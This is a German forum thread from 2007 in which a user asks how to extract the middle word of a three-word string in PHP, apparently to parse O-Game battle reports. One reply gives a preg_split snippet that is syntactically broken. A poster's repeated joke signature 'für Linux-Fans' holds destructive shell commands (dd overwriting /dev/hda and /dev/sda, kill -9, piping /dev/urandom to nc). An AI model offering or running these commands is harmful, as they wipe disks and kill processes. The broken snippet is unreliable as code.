Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 12
Seite [1]
R3NT5CH3R


Beginner




Beiträge: 16
# Thema - 01.01.2007 um 23:55 Uhr
Nabend, na alle gut im neuen Jahr? - Ich schon

Trotzdem muss ich mal kleine Fragen stellen

Frage 1:

Also man nehme an es gibt ein text, der aus 3 Wörtern besteht:
Wort1 Wort2 Wort3

Wort1 und 3 sind mir bekannt, doch Wort2 nicht. Wie bekomm ich denn Wort2 mit php ausgelesen? Mit preg_match vielleicht? (bitte code für oberes beispiel posten und davon ausgehen das vor wort1 und nach wort3 noch mehr steht)

Frage 2:

Das Wort2 das ich dann in einer Variable habe soll nachträglich vom User editiert werden können. d.h. anstelle des wort2 soll eine variable stehen die als platzhalter dienen soll, sodass ein User über ein Formular das Wort entweder leer lassen oder selbst editieren kann.

Ich hoffe jemand kann mir helfen
Inaktiv
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 1 - 02.01.2007 um 00:26 Uhr
könntest du vllt etwas konkreter werden, dann könnte ich vllt helfen^^


------------------
www.laszlokorte.de

Inaktiv
|
R3NT5CH3R
Thread-Ersteller


Beginner




Beiträge: 16
# Antwort: 2 - 02.01.2007 um 00:37 Uhr
ich wüsst nicht wie ich noch konkreter werden könnte.

¤: wenn du en bissl zeit hast, dann add mich im icq


Zuletzt editiert von R3NT5CH3R am 02.01.2007 um 00:37 Uhr (1x Editiert)
Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 3 - 02.01.2007 um 00:39 Uhr
ich adde dich mal "morgen", aber mit konkreter meinte ich eher wofür du es brauchst^^


------------------
www.laszlokorte.de

Inaktiv
|
R3NT5CH3R
Thread-Ersteller


Beginner




Beiträge: 16
# Antwort: 4 - 02.01.2007 um 00:40 Uhr
spielt das eine rolle?^^
(im icq verat ichs dir )


Inaktiv
|
SCHIRI ClanSphere Team


Weltmeister



Herkunft: Hamburg
Beiträge: 5299
# Antwort: 5 - 02.01.2007 um 00:43 Uhr
ok^^, dann bis morgen, geh jetzt mal off


------------------
www.laszlokorte.de

Inaktiv
|
h0n1g


Geekboy




Beiträge: 1013
# Antwort: 6 - 02.01.2007 um 16:42 Uhr
warum sagst du es nicht der allgemeineheit ?

gibt es was zu verbergen ? sind wir so schlimme leute das du uns soetwas "kleines" vorenthalten möchtest ?


Ich verstehe derzeit den sinn nicht, den du bezwecken willst...
möchtest du alle wörter in einer DB speichern und die, die nicht existieren in die db schreiben damit du irgendwann ein online-hp-duden hast ?


------------------
ClanSphere - Makes your website a playmate, just dress her

Inaktiv
|
kasrk1n ClanSphere Team


Poststar





Beiträge: 703
# Antwort: 7 - 02.01.2007 um 16:45 Uhr
er will wohl einfach nur wissen wie er ein fehlendes Wort in einem Satz sucht ..


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 8 - 02.01.2007 um 18:27 Uhr
Nein. Es geht um Kampfberichte (O-Game). Diese Sollen über den Quelltext ausgelesen werden. Da diese sehr systematisch aufgebau sind, braucht man immer nur das Wort in der Mitte. Hier ein Beispiel:

Angreifer: NAME 123x²

In dem Falle benötigt er das Wort NAME. Dieses soll in einen String ein/ausgelesen werden, in ein seperates Textfeld übergeben werden, so das es später ggf. noch editiert werden kann.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
h4ze


Geekboy




Herkunft: Itzehoe
Beiträge: 1433
# Antwort: 9 - 02.01.2007 um 18:29 Uhr
also ohne anwendungsbeispiel kann ich mir da auch so gar keine funktion drunter vorstellen.


------------------
gembee.com - Upload your Life!
A Social Filesharing Network
"Wie YouTube, nur für alle Datei-Typen"


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 10 - 02.01.2007 um 18:29 Uhr
@h4ze: siehe #8 ^^


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Adva


Wannabe poster





Beiträge: 21
# Antwort: 11 - 02.01.2007 um 19:03 Uhr
Wenn der Text wirklich nur aus den 3 Wörtern - getrennt durch Leerschritte - besteht:
 
1.
2.
1. / 2. / ... 
 $split preg_split("/[s]+/i"$text); // die regex "/[w]+/i" sucht nach jeglicher Wildcard (leerzeichen, zeilenumbrüche, ...)
print_r($split);

Wichtig: bei [s] fehlt ein backslash vor dem s, wurde durch den Parser entfernt.

mfg


Zuletzt editiert von Adva am 02.01.2007 um 19:13 Uhr (3x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 12 - 09.01.2007 um 11:19 Uhr
Hat mir über ICQ seine Lösung geschrieben. Ich werde sie hier bei Gelegenhei8t mal reinschreiben. Solange


/closed.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 12
Seite [1]


Sie müssen sich registrieren, um zu antworten.